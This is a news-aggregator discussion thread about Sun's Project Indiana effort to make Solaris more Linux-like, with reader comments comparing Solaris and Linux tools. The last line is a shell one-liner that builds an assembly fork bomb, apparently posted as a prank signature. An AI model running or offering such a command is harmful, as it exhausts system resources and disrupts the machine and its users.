Sun to Make Solaris More Linux Like
ramboando writes "In an effort to spur adoption of Solaris, Sun Microsystems has begun a project code-named Indiana to try to give its operating system some of Linux's success.
Sun has been trying for years to restore the luster of Solaris, but that since has faced a strong challenge chiefly from Linux. Sun wants to embrace some Linux elements so "we make Solaris a better Linux than Linux," said Ian Murdock, Sun's chief operating systems officer, quoting Netscape co-founder Marc Andreessen, whose latest start-up, Ning, uses Solaris.
But it's a tricky balance to adopt elements of Linux while preserving Solaris technology and advantages such as the promise of backward compatibility. "As we make Solaris more familiar to Linux users, we don't [want to] lose what makes it more compelling and competitive.""
The only reason I might change is if Solaris was made open source (and free). Thats the reason Linux is superior. Better support, design etc. flows from that.
...is like making caviar more vegemite-like.
They can start by making the man pages suck.
Ning by the way is yet another piece of do-nothing get-a-life-ware...
A better Linux than free Linux is a Linux they actually pay you to use. Are you listening, Sun?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
I'm using Solaris because the data mining application I'm building (in Lisp) brings the Linux kernel absolutely to its knees.
Tell that to google.
damnit man you don't NEED a command line, why aren't you using punch cards or dip switchs to program the thing!
If you mod me down, I will become more powerful than you can imagine....
Indiana?
3 things about computers: they're alive, they're self-aware, and they hate your guts.
See Non Sequitur by Wiley Miller starting April 16, 2007...
I am TheRaven on Soylent News
Solaris grep in particular is horrible.
vi breaks every time you expand your console beyond 132 characters, and quite a few of the tools on the default PATH don't conform to any modern standard - including POSIX.
Windows with SFU provides a more compatible UNIX environment than what you get out of the box with Solaris.
Somewhere in Redmond, a demon just snorted gasoline and battery acid onto it's keyboard.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;